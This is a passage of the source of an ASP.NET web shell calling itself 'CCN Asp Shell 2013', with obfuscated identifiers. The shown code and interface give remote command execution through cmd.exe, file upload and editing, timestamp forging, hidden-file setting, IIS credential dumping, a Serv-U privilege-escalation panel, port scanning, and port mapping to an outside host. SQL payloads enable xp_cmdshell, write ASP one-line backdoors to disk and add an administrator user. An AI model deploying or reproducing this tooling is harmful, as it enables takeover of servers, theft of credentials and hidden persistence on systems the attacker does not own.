1945. if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))
1946. {
1947. FJvQ(Bin_Files);
1948. }
1949. }
1950. else
1951. {
1952. if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1953. {
1954. Response.Write(Bin_Files.FullName);
1955. FJvQ(Bin_Files);
1956. }
1957. }
1958. }
1959. else
1960. {
1961. StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);
1962. string ava=sr.ReadToEnd();
1963. sr.Close();
1964. if(rAQ.Checked)
1965. {
1966. if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))
1967. {
1968. FJvQ(Bin_Files);
1969. if(YZw.Checked)
1970. {
1971. ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);
1972. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1973. sw.Write(ava);
1974. sw.Close();
1975. }
1976. }
1977. }
1978. else
1979. {
1980. if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)
1981. {
1982. FJvQ(Bin_Files);
1983. if(YZw.Checked)
1984. {
1985. ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);
1986. StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);
1987. sw.Write(ava);
1988. sw.Close();
1989. }
1990. }
1991. }
1992. }
1993. }
1994. catch(Exception ex)
1995. {
1996. xseuB(ex.Message);
1997. continue;
1998. }
1999. }
2000. foreach(DirectoryInfo subdir in dir.GetDirectories())
2001. {
2002. oog(subdir);
2003. }
2004. }
2005. catch(Exception ex)
2006. {
2007. xseuB(ex.Message);
2008. }
2009. }
2010. public void FJvQ(FileInfo objfile)
2011. {
2012. TableRow tr=new TableRow();
2013. TableCell tc=new TableCell();
2014. string bg=OKM();
2015. tr.Attributes["onmouseover"]="this.className='focus';";
2016. tr.CssClass=bg;
2017. tr.Attributes["onmouseout"]="this.className='"+bg+"';";
2018. tc.Text="<a href=\"javascript:Bin_PostBack('Bin_Listdir','"+MVVJ(objfile.DirectoryName)+"')\">"+objfile.FullName+"</a>";
2019. tr.Cells.Add(tc);
2020. tc=new TableCell();
2021. tc.Text=objfile.LastWriteTime.ToString();
2022. tr.Cells.Add(tc);
2023. tc=new TableCell();
2024. tc.Text=mTG(objfile.Length);
2025. tr.Cells.Add(tc);
2026. oJiym.Rows.Add(tr);
2027. }
2028. public void xseuB(string instr)
2029. {
2030. jDKt.Visible=true;
2031. jDKt.InnerText=instr;
2032. }
2033. protected void xVm(object sender,EventArgs e)
2034. {
2035. string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();
2036. if(Jfm==Password)
2037. {
2038. Response.Cookies.Add(new HttpCookie(vbhLn,Password));
2039. ljtzC.Visible=false;
2040. PBZw();
2041. }
2042. else
2043. {
2044. tZSx();
2045. }
2046. }
2047. protected void Ybg(object sender,EventArgs e)
2048. {
2049. krIR(Server.MapPath("."));
2050. }
2051. protected void KjPi(object sender,EventArgs e)
2052. {
2053. Bin_H2_Title.InnerText="IIS Spy >>";
2054. WICxe();
2055. VNR.Visible=true;
2056. AdCx();
2057. }
2058. protected void DGCoW(object sender,EventArgs e)
2059. {
2060. try
2061. {
2062. StreamWriter sw;
2063. if(NdCX.SelectedItem.Text=="UTF-8")
2064. {
2065. sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);
2066. }
2067. else
2068. {
2069. sw=new StreamWriter(Sqon.Value,false,Encoding.Default);
2070. }
2071. sw.Write(Xgvv.InnerText);
2072. sw.Close();
2073. xseuB("Save file success !");
2074. }
2075. catch(Exception error)
2076. {
2077. xseuB(error.Message);
2078. }
2079. krIR(AXSbb.Value);
2080. }
2081. protected void lbjLD(object sender,EventArgs e)
2082. {
2083. string FlwA=AXSbb.Value;
2084. FlwA=OElM(FlwA);
2085. try
2086. {
2087. Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));
2088. xseuB("File upload success!");
2089. }
2090. catch(Exception error)
2091. {
2092. xseuB(error.Message);
2093. }
2094. krIR(AXSbb.Value);
2095. }
2096. protected void EXV(object sender,EventArgs e)
2097. {
2098. krIR(AXSbb.Value);
2099. }
2100. protected void mcCY(object sender,EventArgs e)
2101. {
2102. krIR(Server.MapPath("."));
2103. }
2104. protected void iVk(object sender,CommandEventArgs e)
2105. {
2106. krIR(e.CommandArgument.ToString());
2107. }
2108. protected void XXrLw(object sender,EventArgs e)
2109. {
2110. try
2111. {
2112. File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));
2113. File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));
2114. File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));
2115. xseuB("File time clone success!");
2116. }
2117. catch(Exception error)
2118. {
2119. xseuB(error.Message);
2120. }
2121. krIR(AXSbb.Value);
2122. }
2123. protected void tIykC(object sender,EventArgs e)
2124. {
2125. string path=pWVL.Value;
2126. try
2127. {
2128. File.SetAttributes(path,FileAttributes.Normal);
2129. if(ZhWSK.Checked)
2130. {
2131. File.SetAttributes(path,FileAttributes.ReadOnly);
2132. }
2133. if(SsR.Checked)
2134. {
2135. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);
2136. }
2137. if(ccB.Checked)
2138. {
2139. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);
2140. }
2141. if(fbyZ.Checked)
2142. {
2143. File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);
2144. }
2145. File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));
2146. File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));
2147. File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));
2148. xseuB("File attributes modify success!");
2149. }
2150. catch(Exception error)
2151. {
2152. xseuB(error.Message);
2153. }
2154. krIR(AXSbb.Value);
2155. }
2156. protected void VOxn(object sender,EventArgs e)
2157. {
2158. WICxe();
2159. vIac.Visible=true;
2160. Bin_H2_Title.InnerText="Execute Command >>";
2161. }
2162. protected void FbhN(object sender,EventArgs e)
2163. {
2164. try
2165. {
2166. Process ahAE=new Process();
2167. ahAE.StartInfo.FileName=kusi.Value;
2168. ahAE.StartInfo.Arguments=bkcm.Value;
2169. ahAE.StartInfo.UseShellExecute=false;
2170. ahAE.StartInfo.RedirectStandardInput=true;
2171. ahAE.StartInfo.RedirectStandardOutput=true;
2172. ahAE.StartInfo.RedirectStandardError=true;
2173. ahAE.Start();
2174. string Uoc=ahAE.StandardOutput.ReadToEnd();
2175. Uoc=Uoc.Replace("<","&lt;");
2176. Uoc=Uoc.Replace(">","&gt;");
2177. Uoc=Uoc.Replace("\r\n","<br>");
2178. tnQRF.Visible=true;
2179. tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";
2180. }
2181. catch(Exception error)
2182. {
2183. xseuB(error.Message);
2184. }
2185. }
2186. protected void RAFL(object sender,EventArgs e)
2187. {
2188. if(qPdI.Text.Length>0)
2189. {
2190. tpRQ(qPdI.Text);
2191. }
2192. else
2193. {
2194. lFAvw();
2195. }
2196. }
2197. protected void Grxk(object sender,EventArgs e)
2198. {
2199. YUw();
2200. }
2201. protected void ilC(object sender,EventArgs e)
2202. {
2203. tZRH();
2204. }
2205. protected void HtB(object sender,EventArgs e)
2206. {
2207. pDVM();
2208. }
2209. protected void Olm(object sender,EventArgs e)
2210. {
2211. iLVUT();
2212. }
2213. protected void jXhS(object sender,EventArgs e)
2214. {
2215. ADCpk();
2216. }
2217. protected void lRfRj(object sender,EventArgs e)
2218. {
2219. lDODR();
2220. }
2221. protected void xSy(object sender,EventArgs e)
2222. {
2223. xFhz();
2224. }
2225. protected void dMx(object sender,EventArgs e)
2226. {
2227. rAhe();
2228. }
2229. protected void zOVO(object sender,EventArgs e)
2230. {
2231. if(((DropDownList)sender).ID.ToString()=="WYmo")
2232. {
2233. dQIIF.Visible=false;
2234. MasR.Text=WYmo.SelectedItem.Value.ToString();
2235. }
2236. if(((DropDownList)sender).ID.ToString()=="Pvf")
2237. {
2238. xTZY();
2239. }
2240. if(((DropDownList)sender).ID.ToString()=="FGEy")
2241. {
2242. jHIy.InnerText=FGEy.SelectedItem.Value.ToString();
2243. }
2244. if(((DropDownList)sender).ID.ToString()=="NdCX")
2245. {
2246. gLKc(Sqon.Value);
2247. }
2248. }
2249. protected void IkkO(object sender,EventArgs e)
2250. {
2251. krIR(AXSbb.Value);
2252. }
2253. protected void BGY(object sender,EventArgs e)
2254. {
2255. vCf();
2256. }
2257. protected void cptS(object sender,EventArgs e)
2258. {
2259. vNCHZ();
2260. }
2261. protected void fDO(object sender,EventArgs e)
2262. {
2263. MHLv();
2264. }
2265. protected void vJNsE(object sender,EventArgs e)
2266. {
2267. vuou();
2268. xseuB("Clear All Thread ......");
2269. }
2270. protected void wDZ(object sender,EventArgs e)
2271. {
2272. if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;
2273. ruQO();
2274. xseuB("All Thread Start ......");
2275. }
2276. protected void tYoZ(object sender,EventArgs e)
2277. {
2278. }
2279. protected void ELkQ(object sender,EventArgs e)
2280. {
2281. VikG();
2282. GBYT.Visible=true;
2283. string res=string.Empty;
2284. foreach(ScanPort th in IVc)
2285. {
2286. res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";
2287. }
2288. GBYT.InnerHtml=res;
2289. }
2290. protected void ORUgV(object sender,EventArgs e)
2291. {
2292. dwgT();
2293. }
2294. public void WICxe()
2295. {
2296. DCbS.Visible=false;
2297. CzfO.Visible=false;
2298. APl.Visible=false;
2299. vIac.Visible=false;
2300. kkHN.Visible=false;
2301. YwLB.Visible=false;
2302. iDgmL.Visible=false;
2303. hOWTm.Visible=false;
2304. vrFA.Visible=false;
2305. yhv.Visible=false;
2306. }
2307. </script>
2308. <html xmlns="http://www.w3.org/1999/xhtml" >
2309. <head id="Head1" runat="server">
2310. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>
2311. <title>CCN Asp Sheel</title>
2312. <style type="text/css">
2313. .Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}
2314. body,td{font: 12px Arial,Tahoma;line-height: 16px;}
2315. .input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}
2316. .list{font:12px Arial,Tahoma;height:23px;}
2317. .area{font:12px 'Courier New',Monospace;background:#fff;border: 1px solid #666;padding:2px;}
2318. .bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
2319. a {color: #00f;text-decoration:underline;}
2320. a:hover{color: #f00;text-decoration:none;}
2321. .alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ededed;padding:5px 10px 5px 5px;}
2322. .alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#fafafa;padding:5px 10px 5px 5px;}
2323. .focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}
2324. .head td{border-top:1px solid #ddd;border-bottom:1px solid #ccc;background:#e8e8e8;padding:5px 10px 5px 5px;font-weight:bold;}
2325. .head td span{font-weight:normal;}
2326. form{margin:0;padding:0;}
2327. h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
2328. ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
2329. u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2330. .u1{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
2331. .u2{text-decoration: none;color:#777;float:left;display:block;width:350px;margin-right:10px;}
2332. </style>
2333. <script type="text/javascript">
2334. function CheckAll(form){
2335. for(var i=0;i<form.elements.length;i++){
2336. var e=form.elements[i];
2337. if(e.name!='chkall')
2338. e.checked=form.chkall.checked;
2339. }
2340. }
2341. </script>
2342. </head>
2343. <body style="margin:0;table-layout:fixed;">
2344. <form id="ASPXSpy" runat="server">
2345. <div id="ljtzC" runat="server" style=" margin:15px" enableviewstate="false" visible="false" >
2346. <span style="font:11px Verdana;">Password:</span>
2347. <asp:TextBox ID="HRJ" runat="server" Columns="20" CssClass="Bin_Style_Login" ></asp:TextBox>
2348. <asp:Button ID="ZSnXu" runat="server" Text="Login" CssClass="Bin_Style_Login" OnClick="xVm"/><p/>
2349. Copyright &copy; 2013 - <a href="http://cybercrew-newbie.blogspot.com" target="_blank">CyberCrew-Newbie</a>
2350. </div>
2351. <div id="ZVS" runat="server">
2352. <div id="Zzj" runat="server">
2353. <table width="100%" border="0" cellpadding="0" cellspacing="0">
2354. <tr class="head">
2355. <td ><span style="float:right;"><a href="http://cybercrew-newbie.blogspot.com" target="_blank">CCN Asp Shell 2013</a></span><span id="miansha2" runat="server" enableviewstate="true"></span></td>
2356. </tr>
2357. <tr class="alt1">
2358. <td><span style="float:right;" id="Bin_Span_FrameVersion" runat="server"></span>
2359. <asp:LinkButton ID="UtkN" runat="server" OnClick="YKpI" Text="Logout" ></asp:LinkButton> | <asp:LinkButton ID="RsqhW" runat="server" Text="File Manager" OnClick="Ybg"></asp:LinkButton> | <asp:LinkButton ID="xxzE" runat="server" Text="CmdShell" OnClick="VOxn"></asp:LinkButton> | <asp:LinkButton ID="nuc" runat="server" Text="IIS Spy" OnClick="KjPi"></asp:LinkButton> | <asp:LinkButton ID="OREpx" runat="server" Text="Process" OnClick="Grxk"></asp:LinkButton> | <asp:LinkButton ID="jHN" runat="server" Text="Services" OnClick="ilC"></asp:LinkButton> | <asp:LinkButton ID="PHq" runat="server" Text="UserInfo" OnClick="Olm"></asp:LinkButton> | <asp:LinkButton ID="wmgnK" runat="server" Text="SysInfo" OnClick="HtB"></asp:LinkButton> | <asp:LinkButton ID="FeV" runat="server" Text="FileSearch" OnClick="PPtK"></asp:LinkButton> | <asp:LinkButton ID="PVQ" runat="server" Text="SU Exp" OnClick="jXhS"></asp:LinkButton> | <asp:LinkButton ID="jNDb" runat="server" Text="RegShell" OnClick="xSy"></asp:LinkButton> | <asp:LinkButton ID="HDQ" runat="server" Text="PortScan" OnClick="cptS" ></asp:LinkButton> | <asp:LinkButton ID="AoI" runat="server" Text="DataBase" OnClick="dMx"></asp:LinkButton> | <asp:LinkButton ID="KHbEd" runat="server" Text="PortMap" OnClick="fDO"></asp:LinkButton>
2360. </td>
2361. </tr>
2362. </table>
2363. </div>
2364. <table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
2365. <div id="jDKt" style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;" runat="server" visible="false" enableviewstate="false"></div>
2366. <h2 id="Bin_H2_Title" runat="server"></h2>
2367. <%--FileList--%>
2368. <div id="CzfO" runat="server">
2369. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2370. <tr>
2371. <td style=" white-space:nowrap">Current Directory : </td>
2372. <td style=" width:100%"><input class="input" id="AXSbb" type="text" style="width:97%;margin:0 8px;" runat="server"/>
2373. </td>
2374. <td style="white-space:nowrap" ><asp:Button ID="xaGwl" runat="server" Text="Go" CssClass="bt" OnClick="EXV"/></td>
2375. </tr>
2376. </table>
2377. <table width="100%" border="0" cellpadding="4" cellspacing="0">
2378. <tr class="alt1"><td colspan="7" style="padding:5px;">
2379. <div style="float:right;"><input id="Fhq" class="input" runat="server" type="file" style=" height:22px"/>
2380. <asp:Button ID="RvPp" CssClass="bt" runat="server" Text="Upload" OnClick="lbjLD"/></div><asp:LinkButton ID="OLJFp" runat="server" Text="WebRoot" OnClick="mcCY"></asp:LinkButton> | <a href="#" id="Bin_Button_CreateDir" runat="server">Create Directory</a> | <a href="#" id="Bin_Button_CreateFile" runat="server">Create File</a>
2381. | <span id="Bin_Span_Drv" runat="server"></span><a href="#" id="Bin_Button_KillMe" runat="server" style="color:Red">Kill Me</a>
2382. </td></tr>
2383. <asp:Table ID="UGzP" runat="server" Width="100%" CellSpacing="0" >
2384. <asp:TableRow CssClass="head"><asp:TableCell>&nbsp;</asp:TableCell><asp:TableCell>Filename</asp:TableCell><asp:TableCell Width="25%">Last modified</asp:TableCell><asp:TableCell Width="15%">Size</asp:TableCell><asp:TableCell Width="25%">Action</asp:TableCell></asp:TableRow>
2385. </asp:Table>
2386. </table>
2387. </div>
2388. <%--FileEdit--%>
2389. <div id="vrFA" runat="server">
2390. <p>Current File(import new file name and new file)<br/>
2391. <input class="input" id="Sqon" type="text" size="100" runat="server"/> <asp:DropDownList ID="NdCX" runat="server" CssClass="list" AutoPostBack="true" OnSelectedIndexChanged="zOVO"><asp:ListItem>Default</asp:ListItem><asp:ListItem>UTF-8</asp:ListItem></asp:DropDownList>
2392. </p>
2393. <p>File Content<br/>
2394. <textarea id="Xgvv" runat="server" class="area" cols="100" rows="25" enableviewstate="true" ></textarea>
2395. </p>
2396. <p><asp:Button ID="JJjbW" runat="server" Text="Submit" CssClass="bt" OnClick="DGCoW"/> <asp:Button ID="iCNu" runat="server" Text="Back" CssClass="bt" OnClick="IkkO"/></p>
2397. </div>
2398. <%--CloneTime--%>
2399. <div id="zRyG" runat="server" enableviewstate="false" visible="false">
2400. <p>Alter file<br/><input class="input" id="QiFB" type="text" size="120" runat="server"/></p>
2401. <p>Reference file(fullpath)<br/><input class="input" id="lICp" type="text" size="120" runat="server"/></p>
2402. <p><asp:Button ID="JEaxV" runat="server" Text="Submit" CssClass="bt" OnClick="XXrLw"/></p>
2403. <h2>Set last modified &raquo;</h2>
2404. <p>Current file(fullpath)<br/><input class="input" id="pWVL" type="text" size="120" runat="server"/></p>
2405. <p>
2406. <asp:CheckBox ID="ZhWSK" runat="server" Text="ReadOnly" EnableViewState="False"/>
2407. &nbsp;
2408. <asp:CheckBox ID="SsR" runat="server" Text="System" EnableViewState="False"/>
2409. &nbsp;
2410. <asp:CheckBox ID="ccB" runat="server" Text="Hidden" EnableViewState="False"/>
2411. &nbsp;
2412. <asp:CheckBox ID="fbyZ" runat="server" Text="Archive" EnableViewState="False"/>
2413. </p>
2414. <p>
2415. CreationTime :
2416. <input class="input" id="yUqx" type="text" runat="server"/>
2417. LastWriteTime :
2418. <input class="input" id="uYjw" type="text" runat="server"/>
2419. LastAccessTime :
2420. <input class="input" id="aLsn" type="text" runat="server"/>
2421. </p>
2422. <p>
2423. <asp:Button ID="kOG" CssClass="bt" runat="server" Text="Submit" OnClick="tIykC"/>
2424. </p>
2425. </div>
2426. <%--IISSpy--%>
2427. <div runat="server" id="VNR" visible="false" enableviewstate="false">
2428. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2429. <asp:Table ID="GlI" runat="server" Width="100%" CellSpacing="0">
2430. <asp:TableRow CssClass="head"><asp:TableCell>ID</asp:TableCell><asp:TableCell>IIS_USER</asp:TableCell><asp:TableCell>IIS_PASS</asp:TableCell><asp:TableCell>Domain</asp:TableCell><asp:TableCell>Path</asp:TableCell></asp:TableRow>
2431. </asp:Table>
2432. </table>
2433. </div>
2434. <%--Process--%>
2435. <div runat="server" id="DCbS" visible="false" enableviewstate="false">
2436. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2437. <asp:Table ID="IjsL" runat="server" Width="100%" CellSpacing="0" >
2438. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Process</asp:TableCell><asp:TableCell>ThreadCount</asp:TableCell><asp:TableCell>Priority</asp:TableCell><asp:TableCell>Action</asp:TableCell></asp:TableRow>
2439. </asp:Table>
2440. </table>
2441. </div>
2442. <%--CmdShell--%>
2443. <div runat="server" id="vIac">
2444. <p>CmdPath:<br/>
2445. <input class="input" runat="server" id="kusi" type="text" size="100" value="c:\windows\system32\cmd.exe"/>
2446. </p>
2447. Argument:<br/>
2448. <input class="input" runat="server" id="bkcm" value="/c Set" type="text" size="100"/> <asp:Button ID="YrqL" CssClass="bt" runat="server" Text="Submit" OnClick="FbhN"/>
2449. <div id="tnQRF" runat="server" visible="false" enableviewstate="false">
2450. </div>
2451. </div>
2452. <%--Services--%>
2453. <div runat="server" id="iQxm" visible ="false" enableviewstate="false">
2454. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2455. <asp:Table ID="vHCs" runat="server" Width="100%" CellSpacing="0" >
2456. <asp:TableRow CssClass="head"><asp:TableCell></asp:TableCell><asp:TableCell>ID</asp:TableCell><asp:TableCell>Name</asp:TableCell><asp:TableCell>Path</asp:TableCell><asp:TableCell>State</asp:TableCell><asp:TableCell>StartMode</asp:TableCell></asp:TableRow>
2457. </asp:Table>
2458. </table>
2459. </div>
2460. <%--Sysinfo--%>
2461. <div runat="server" id="ghaB" visible="false" enableviewstate="false">
2462. <hr style=" border: 1px solid #ddd;height:0px;"/>
2463. <ul class="info" id="Bin_Ul_Sys" runat="server"></ul>
2464. <h2 id="Bin_H2_Mac" runat="server"></h2>
2465. <hr style=" border: 1px solid #ddd;height:0px;"/>
2466. <ul class="info" id ="Bin_Ul_NetConfig" runat="server"></ul>
2467. <h2 id="Bin_H2_Driver" runat="server"></h2>
2468. <hr style=" border: 1px solid #ddd;height:0px;"/>
2469. <ul class="info" id ="Bin_Ul_Driver" runat="server"></ul>
2470. </div>
2471. <%--UserInfo--%>
2472. <div runat="server" id="xWVQ" visible="false" enableviewstate="false">
2473. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2474. <asp:Table ID="VPa" runat="server" Width="100%" CellSpacing="0" >
2475. </asp:Table>
2476. </table>
2477. </div>
2478. <%--SuExp--%>
2479. <div runat="server" id="APl">
2480. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2481. <tr align="center">
2482. <td style="width:10%"></td>
2483. <td style="width:20%" align="left">UserName : <input class="input" runat="server" id="dNohJ" type="text" size="20" value="localadministrator"/></td>
2484. <td style="width:20%" align="left">PassWord : <input class="input" runat="server" id="NMd" type="text" size="20" value="#l@$ak#.lk;0@P"/></td>
2485. <td style="width:20%" align="left">Port : <input class="input" runat="server" id="HlQl" type="text" size="20" value="43958"/></td>
2486. <td style="width:10%"></td>
2487. </tr>
2488. <tr >
2489. <td style="width:10%"></td>
2490. <td colspan="5">CmdShell&nbsp;&nbsp;:&nbsp;<input class="input" runat="server" id="mHbjB" type="text" size="100" value="cmd.exe /c net user"/> <asp:Button ID="SPhc" CssClass="bt" runat="server" Text="Exploit" OnClick="lRfRj"/></td>
2491. </tr>
2492. </table>
2493. <div id="UHlA" visible="false" enableviewstate="false" runat="server">
2494. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2495. <tr align="center">
2496. <td style="width:30%"></td>
2497. <td align="left" style="width:40%"><pre id="Bin_Td_Res" runat="server"></pre></td>
2498. <td style="width:30%"></td>
2499. </tr>
2500. </table>
2501. </div>
2502. </div>
2503. <%--Reg--%>
2504. <div id="kkHN" runat="server">
2505. <p>Registry Path : <asp:TextBox id="qPdI" style="width:85%;margin:0 8px;" CssClass="input" runat="server"/><asp:Button ID="MoNA" runat="server" Text="Go" CssClass="bt" onclick="RAFL"/></p>
2506. <table width="100%" border="0" cellpadding="0" cellspacing="0" style="margin:10px 0;">
2507. <asp:Table ID="pLWD" runat="server" Width="100%" CellSpacing="0" >
2508. <asp:TableRow CssClass="alt1"><asp:TableCell ColumnSpan="2" id="vyX"></asp:TableCell></asp:TableRow>
2509. <asp:TableRow CssClass="head"><asp:TableCell Width="40%">Key</asp:TableCell><asp:TableCell Width="60%">Value</asp:TableCell></asp:TableRow>
2510. </asp:Table>
2511. </table>
2512. </div>
2513. <%--PortScan--%>
2514. <div id="YwLB" runat="server">
2515. <p>
2516. IP : <asp:TextBox id="MdR" style="width:10%;margin:0 8px;" CssClass="input" runat="server" Text="127.0.0.1"/> Port : <asp:TextBox id="lOmX" style="width:40%;margin:0 8px;" CssClass="input" runat="server" Text="21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"/> <asp:Button ID="CmUCh" runat="server" Text="Scan" CssClass="bt" OnClick="ELkQ"/>
2517. </p>
2518. <div id="GBYT" runat="server" visible="false" enableviewstate="false"></div>
2519. </div>
2520. <%--DataBase--%>
2521. <div id="iDgmL" runat="server">
2522. <p>ConnString : <asp:TextBox id="MasR" style="width:70%;margin:0 8px;" CssClass="input" runat="server"/><asp:DropDownList runat="server" CssClass="list" ID="WYmo" AutoPostBack="True" OnSelectedIndexChanged="zOVO" ><asp:ListItem></asp:ListItem><asp:ListItem Value="server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB">MSSQL</asp:ListItem><asp:ListItem Value="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\database.mdb">ACCESS</asp:ListItem></asp:DropDownList><asp:Button ID="QcZPA" runat="server" Text="Go" CssClass="bt" OnClick="BGY"/></p>
2523. <div id="dQIIF" runat="server">
2524. <div id="irTU" runat="server"></div>
2525. <div id="uXevN" runat="server">
2526. Please select a database : <asp:DropDownList runat="server" ID="Pvf" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"></asp:DropDownList>
2527. SQLExec : <asp:DropDownList runat="server" ID="FGEy" AutoPostBack="True" OnSelectedIndexChanged="zOVO" CssClass="list"><asp:ListItem Value="">-- SQL Server Exec --</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')">Add xp_cmdshell</asp:ListItem><asp:ListItem Value="Use master dbcc addextendedproc('sp_OACreate','odsole70.dll')">Add sp_oacreate</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;">Add xp_cmdshell(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;">Add sp_oacreate(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Web Assistant Procedures',1;RECONFIGURE;">Add makewebtask(SQL2005)</asp:ListItem><asp:ListItem Value="Exec sp_configure 'show advanced options',1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;">Add openrowset/opendatasource(SQL2005)</asp:ListItem><asp:ListItem Value="Exec master.dbo.xp_cmdshell 'net user'">XP_cmdshell exec</asp:ListItem><asp:ListItem Value="EXEC MASTER..XP_dirtree 'c:\',1,1">XP_dirtree</asp:ListItem><asp:ListItem Value="Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^&lt;%execute(request(char(35)))%^>>c:\bin.asp';">SP_oamethod exec</asp:ListItem><asp:ListItem Value="sp_makewebtask @outputfile='c:\bin.asp',@charset=gb2312,@query='select ''&lt;%execute(request(chr(35)))%&gt;'''">SP_makewebtask make file</asp:ListItem><asp:ListItem Value="exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1;select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell(&#34;cmd.exe /c net user root root/add &#34;)')">SandBox</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup log @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='e:\1.asp' backup log @b to disk=@t with init,no_truncate;drop table [bin_cmd];">LogBackup</asp:ListItem><asp:ListItem Value="create table [bin_cmd]([cmd] [image]);declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;insert into [bin_cmd](cmd)values('&lt;%execute(request(chr(35)))%&gt;');declare @b sysname,@t nvarchar(4000)select @b=db_name(),@t='c:\bin.asp' backup database @b to disk=@t WITH DIFFERENTIAL,FORMAT;drop table [bin_cmd];">DatabaseBackup</asp:ListItem></asp:DropDownList>
2528. </div>
2529. <table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td> Run SQL </td></tr><tr><td><textarea id="jHIy" class="area" style="width:600px;height:60px;overflow:auto;" runat="server" rows="6" cols="1"></textarea></td></tr><tr><td>
2530. <asp:Button runat="server" ID="WOhJ" CssClass="bt" Text="Query" onclick="ORUgV"/></td></tr></table>
2531. <div style="overflow-x:auto;width:950px" >
2532. <p>
2533. <asp:DataGrid runat="server" ID="rom" HeaderStyle-CssClass="head" BorderWidth="0" GridLines="None" ></asp:DataGrid>
2534. </p>
2535. </div>
2536. </div>
2537. </div>
2538. <%--PortMap--%>
2539. <div id="hOWTm" runat="server">
2540. <table width="100%" border="0" cellpadding="4" cellspacing="0" style="margin:10px 0;">
2541. <tr align="center">
2542. <td style="width:5%"></td>
2543. <td style="width:20%" align="left">Local Ip : <input class="input" runat="server" id="eEpm" type="text" size="20" value="127.0.0.1"/></td>
2544. <td style="width:20%" align="left">Local Port : <input class="input" runat="server" id="iXdh" type="text" size="20" value="3389"/></td>
2545. <td style="width:20%" align="left">Remote Ip : <input class="input" runat="server" id="llH" type="text" size="20" value="www.rootkit.net.cn"/></td>
2546. <td style="width:20%" align="left">Remote Port : <input class="input" runat="server" id="ZHS" type="text" size="20" value="80"/></td></tr>
